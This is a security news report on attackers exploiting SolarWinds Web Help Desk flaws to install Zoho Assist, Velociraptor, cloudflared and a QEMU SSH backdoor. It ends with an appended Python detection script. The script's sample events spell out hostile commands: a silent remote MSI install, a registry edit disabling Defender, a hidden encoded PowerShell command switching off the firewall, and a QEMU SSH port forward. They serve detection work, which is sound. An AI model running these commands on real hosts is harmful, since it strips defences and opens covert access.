Hackers exploit SolarWinds WHD flaws to deploy DFIR tool in attacks
Source: Bleeping Computer

Attackers are exploiting SolarWinds Web Help Desk (WHD) vulnerabilities to deploy legitimate tools for malicious purposes, among them the Zoho ManageEngine Assist remote access agent. They have hit at least three organizations, used Cloudflare tunnels for persistence, and turned the Velociraptor incident response tool into a command‑and‑control (C2) channel.
The malicious activity was spotted over the weekend by researchers at Huntress Security, who believe it is part of a campaign that started on January 16 and leveraged recently disclosed SolarWinds WHD flaws.
“On February 7, 2026, Huntress SOC analyst Dipo Rodipe investigated a case of SolarWinds Web Help Desk exploitation, in which the threat actor rapidly deployed Zoho Meetings and Cloudflare tunnels for persistence, as well as Velociraptor for means of command and control,” – Huntress.
According to Huntress, the threat actor exploited CVE‑2025‑40551 (which CISA has flagged as actively exploited) and CVE‑2025‑26399. Both vulnerabilities are rated critical and allow unauthenticated remote code execution on the WHD host.
Microsoft security researchers also observed a multi‑stage intrusion involving internet‑exposed SolarWinds WHD instances, though they did not confirm exploitation of the two specific vulnerabilities.
Attack chain and tool deployment
After gaining initial access, the attacker:
- Installed the Zoho ManageEngine Assist agent via an MSI file fetched from the Catbox file‑hosting platform, configured it for unattended access, and registered the compromised host to a Zoho Assist account tied to an anonymous ProtonMail address.
- Used the tool for direct hands‑on keyboard activity and Active Directory (AD) reconnaissance.
- Deployed Velociraptor, fetched as an MSI file from a Supabase bucket. Velociraptor is a legitimate digital forensics and incident response (DFIR) tool that has been abused in ransomware attacks. In these incidents, the DFIR platform was used as a C2 framework communicating via Cloudflare Workers.
- Used an outdated Velociraptor build, version 0.73.4, which carries a known privilege‑escalation flaw that can be abused to gain higher permissions on the host.
- Installed cloudflared from Cloudflare’s official GitHub repository, using it as a secondary tunnel‑based access channel for C2 redundancy.
- Achieved persistence in some cases via a scheduled task (TPMProfiler) that opens an SSH backdoor through QEMU.
- Disabled Windows Defender and the firewall via registry modifications, then downloaded a fresh copy of the VS Code binary.

Attack chain – Source: Huntress
Security updates and mitigation
- Upgrade SolarWinds Web Help Desk to version 2026.1 or later.
- Remove public internet access to SolarWinds WHD admin interfaces.
- Reset all credentials associated with the product.
- Deploy the Sigma rules and indicators of compromise shared by Huntress to detect Zoho Assist, Velociraptor, cloudflared, VS Code tunnel activity, silent MSI installations, and encoded PowerShell execution.
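As an added example (not code from the article, from Huntress, or from Microsoft), the Python below shows how the behaviours in the attack chain and the indicators in the mitigation list translate into host‑side detection logic run over constructed process‑creation events shaped like Sysmon Event ID 1 fields. It covers the silent MSI pulled from a URL, Velociraptor, cloudflared and VS Code tunnel execution, the TPMProfiler scheduled task launching QEMU, and Defender/firewall registry tampering; it goes one step beyond the list by decoding encoded PowerShell and re‑scanning the decoded script. The file paths, host names, QEMU hostfwd arguments and registry value names are assumptions about what such activity would look like, not details taken from the report; the only specific carried over is the TPMProfiler task name. The Zoho agent itself is left out because the page gives no binary name for it.

```python
"""Host-side checks for the tradecraft described above: silent MSI pulled from a URL,
Velociraptor / cloudflared / VS Code tunnel execution, Defender and firewall
tampering through the registry (plain or hidden in encoded PowerShell), and a
scheduled task that launches QEMU with an SSH port forward.
All events below are CONSTRUCTED samples shaped like Sysmon Event ID 1 fields,
not log lines from the Huntress or Microsoft reports; paths and hosts are placeholders."""
import base64
import ntpath
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    image: str    # full path of the created process
    cmdline: str  # its command line


def encoded_powershell(cmdline):
    """Return the decoded script if cmdline carries -e/-enc/-EncodedCommand <base64>.
    PowerShell accepts any unambiguous prefix of -EncodedCommand; the payload is
    base64 over UTF-16LE text. -ExecutionPolicy fails the prefix test and is ignored."""
    m = re.search(r"(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]{16,})", cmdline, re.I)
    if not m or not "encodedcommand".startswith(m.group(1).lower()):
        return None
    try:
        return base64.b64decode(m.group(2), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def encode_ps(script):
    """Build the payload PowerShell expects after -EncodedCommand (used to construct the sample)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Registry locations and value names whose modification disables Defender or the firewall (assumed set).
SECURITY_KEYS = ("windows defender", "firewallpolicy")
TAMPER_VALUES = ("disableantispyware", "disablerealtimemonitoring", "enablefirewall")


def registry_tamper(text):
    """True if text writes one of the Defender/firewall policy values (reg.exe or PowerShell syntax)."""
    t = text.lower()
    return any(k in t for k in SECURITY_KEYS) and any(v in t for v in TAMPER_VALUES)


def classify(ev):
    """Return the detection tags this event triggers (empty list if none)."""
    tags = []
    exe = ntpath.basename(ev.image).lower()
    cl = ev.cmdline.lower()
    # 1. msiexec installing straight from a URL with a silent switch (/qn, /quiet, /q)
    if exe == "msiexec.exe" and re.search(r"/(i|package)\s+https?://", cl) and re.search(r"/(qn|quiet|q\b)", cl):
        tags.append("silent_remote_msi")
    # 2. legitimate remote-access / DFIR tooling used as an access or C2 channel
    if exe == "cloudflared.exe" and "tunnel" in cl:
        tags.append("cloudflared_tunnel")
    if exe == "velociraptor.exe" and re.search(r"\bclient\b", cl):
        tags.append("velociraptor_client")
    if exe == "code.exe" and re.search(r"\btunnel\b", cl):
        tags.append("vscode_tunnel")
    # 3. scheduled task whose action launches QEMU, and QEMU forwarding a host port to guest port 22
    if exe == "schtasks.exe" and "/create" in cl and "qemu-system" in cl:
        tags.append("schtask_launches_qemu")
    if exe.startswith("qemu-system") and re.search(r"hostfwd=tcp:[^,\s]*-:22\b", cl):
        tags.append("qemu_ssh_portforward")
    # 4. Defender / firewall tampering, on the command line or inside the decoded script
    if exe in ("reg.exe", "powershell.exe", "pwsh.exe") and registry_tamper(cl):
        tags.append("security_registry_tamper")
    decoded = encoded_powershell(ev.cmdline) if exe in ("powershell.exe", "pwsh.exe") else None
    if decoded is not None:
        tags.append("encoded_powershell")
        if registry_tamper(decoded):
            tags.append("security_registry_tamper")
    return tags


def scan(events):
    """Map event index -> tags for every event that triggered at least one check."""
    hits = {}
    for i, ev in enumerate(events):
        tags = classify(ev)
        if tags:
            hits[i] = tags
    return hits


QEMU_ARGS = "-m 256 -netdev user,id=n0,hostfwd=tcp::2222-:22 -device e1000,netdev=n0"
FIREWALL_OFF = ("Set-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess"
                "\\Parameters\\FirewallPolicy\\StandardProfile' -Name EnableFirewall -Value 0")

SAMPLE_EVENTS = [  # constructed samples; events 1 and 8 are benign controls
    ProcEvent(r"C:\Windows\System32\msiexec.exe", "msiexec.exe /i https://files.example.net/assist.msi /qn /norestart"),
    ProcEvent(r"C:\Windows\System32\msiexec.exe", r"msiexec.exe /i C:\Users\alice\Downloads\7z.msi /qn"),
    ProcEvent(r"C:\Program Files\Velociraptor\Velociraptor.exe", r'"Velociraptor.exe" --config C:\ProgramData\client.config.yaml client'),
    ProcEvent(r"C:\ProgramData\cf\cloudflared.exe", "cloudflared.exe tunnel run --token REDACTED"),
    ProcEvent(r"C:\Windows\System32\schtasks.exe",
              f'schtasks /Create /TN TPMProfiler /SC ONLOGON /RU SYSTEM /TR "C:\\ProgramData\\qemu\\qemu-system-x86_64.exe {QEMU_ARGS}"'),
    ProcEvent(r"C:\ProgramData\qemu\qemu-system-x86_64.exe", f"qemu-system-x86_64.exe {QEMU_ARGS}"),
    ProcEvent(r"C:\Windows\System32\reg.exe",
              r'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f'),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell.exe -nop -w hidden -enc " + encode_ps(FIREWALL_OFF)),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"),
    ProcEvent(r"C:\Users\alice\AppData\Local\Programs\Microsoft VS Code\Code.exe", "Code.exe tunnel --accept-server-license-terms"),
]

if __name__ == "__main__":
    for i, tags in scan(SAMPLE_EVENTS).items():
        print(f"event {i}: {', '.join(tags)}")
```

Each check is deliberately narrow (msiexec only fires when the package argument is a URL and a silent switch is present, so a local silent install of a packaging tool stays quiet), and the encoded‑PowerShell path feeds the decoded script back through the same registry check, which is what catches the firewall being switched off in event 7 while the plain command line shows nothing suspicious.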
Neither Microsoft nor Huntress attributed the observed attacks to any specific threat group, and details about the targets were limited to Microsoft characterizing the breached environments as “high‑value assets.”